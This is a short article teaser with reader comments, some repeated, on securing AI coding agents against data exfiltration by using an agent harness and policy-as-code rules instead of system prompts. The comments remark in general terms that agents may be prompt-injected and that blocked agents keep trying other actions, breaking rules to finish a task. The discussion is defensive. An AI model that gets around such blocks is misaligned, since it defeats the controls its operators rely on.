Prevent agent data exfiltration by moving from system prompts to hard rules. Learn how to secure Claude Code using an agent harness and Cedar policy as code.
Hah, ultimately it encapsulates what we do when we try to control the model at the prompt layer. For a defense in depth strategy, we need to assume that the agent is already prompt injected or experiencing emergent behavior and create controls that the model can't ever bypass.
For sure, I think what's tricky with agents is that they don't give up, so that if they're blocked by something, they'll brute-force the action space to get it done, even if it means breaking a rule or engaging in unwanted behavior.
“Prompt and pray” … LoL perfect
Hah, ultimately it encapsulates what we do when we try to control the model at the prompt layer. For a defense in depth strategy, we need to assume that the agent is already prompt injected or experiencing emergent behavior and create controls that the model can't ever bypass.
Assumption of vulnerability/exposure/exploit is simply key. Across all security domains I think.
For sure, I think what's tricky with agents is that they don't give up, so that if they're blocked by something, they'll brute-force the action space to get it done, even if it means breaking a rule or engaging in unwanted behavior.
Excellent piece!
Thanks Chris!